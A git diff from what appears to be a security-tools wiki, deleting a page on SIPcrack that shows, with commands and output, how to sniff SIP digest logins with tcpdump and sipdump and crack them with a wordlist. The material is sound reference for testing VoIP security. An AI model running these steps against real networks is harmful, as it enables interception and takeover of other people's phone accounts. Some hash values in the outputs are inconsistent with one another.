diff --git a/password/index.md b/password/index.md index 2052417..0f1f870 100644 --- a/password/index.md +++ b/password/index.md @@ -30,7 +30,7 @@ Offline Attacks * [rcracki_mt](../tools/rcracki_mt.md) * [rsmangler](../tools/rsmangler.md) * [samdump2](../tools/samdump2.md) - * [sipcrack](../tools/sipcrack.md) + * [sipcrack](../tools/_template.md) * [sucrack](../tools/_template.md) * [truecrack](../tools/_template.md) diff --git a/tools/sipcrack.md b/tools/sipcrack.md deleted file mode 100644 index 2d92054..0000000 --- a/tools/sipcrack.md +++ /dev/null @@ -1,134 +0,0 @@ -# sipcrack - -Notes -------- -SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol. - -The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts. - -SIPcrack contains 2 programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. sipdump dumps SIP digest authentications. If a login is found, the sniffed login is written to the dump file. See 'sipdump -h' for options. - -sipcrack bruteforces the user's password with the dump file generated by sipdump. If a password is found, the sniffed and cracked login will be updated in the dump file. See 'sipcrack -h' for options. - - -Help Text -------- -``` -SIPcrack 0.2 ( MaJoMu | www.codito.de ) ----------------------------------------- - -Usage: sipcrack [OPTIONS] [ -s | -w ] - - = file containing logins sniffed by SIPdump - - Options: - -s = use stdin for passwords - -w wordlist = file containing all passwords to try - -p num = print cracking process every n passwords (for -w) - (ATTENTION: slows down heavily) - -* Either -w or -s has to be given -``` - -Example Usage -------- -Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. - -Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated. - - -Example from [aldeid](http://www.aldeid.com/wiki/Crack-VoIP) - -*Capturing the traffic* - -Let's capture the traffic using tcpdump: - -``` -$ tcpdump -s0 -w sip.pcap tcp or udp -``` - -*Isolating the login* - -sipdump is a tool shipped with SIPcrack. It enables to detect the SIP login from a related traffic capture file. - -``` -$ cd ~/src/SIPcrack-0.3pre/ -$ ./sipdump -p ~/tmp/sip.pcap logins.dump - -SIPdump 0.3pre ( MaJoMu | www.codito.de ) ---------------------------------------- - -* Using pcap file '../../tmp/sip.pcap' for sniffing -* Starting to sniff with packet filter 'tcp or udp' - -* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158') - -* Exiting, sniffed 1 logins -$ cat logins.dump -192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062 -"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383 -``` - -As you can see from the string above, the login appears in clear, and the password as a MD5 hash. - -Notice that we could also have used tshark to obtain the same result: - -``` -$ tshark -r sip.pcap -Tfields -e sip.auth | grep username -Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", -nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\", -response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5, -opaque=\"04cc3f555880bdf\"\x0d\x0a -Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", -nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\", -response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5, -opaque=\"04cd38e646e760\"\x0d\x0a -``` - -*Cracking the password* - -sipcrack is based on dictionaries to crack the password. For the example, we have built a file containing our password. - -``` -$ car ~/exploits/dictionaries/test.txt -azerty -elephant -test -password -admin -password01 -Password01 -507ZEy@l -oops -oopsoops -cat -dog7 -monster - -$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump - -SIPcrack 0.3pre ( MaJoMu | www.codito.de ) ----------------------------------------- - -* Found Accounts: - -Num Server Client User Hash|Password - -1 192.168.1.29 212.27.52.5 0950236158 dc59495f8eb78a605a2ad5d57835a383 - -* Select which entry to crack (1 - 1): 1 - -* Generating static MD5 hash... 04cd38e646e760da129f99fa734ac1e4 -* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') -* Loaded wordlist: '~/exploits/dictionaries/test.txt' -* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') -* Tried 10 passwords in 0 seconds - -* Found password: '507ZEy@l' -* Updating dump file 'logins.dump'... done -``` - - -Links -------- -* [cracking VOIP](http://www.aldeid.com/wiki/Crack-VoIP)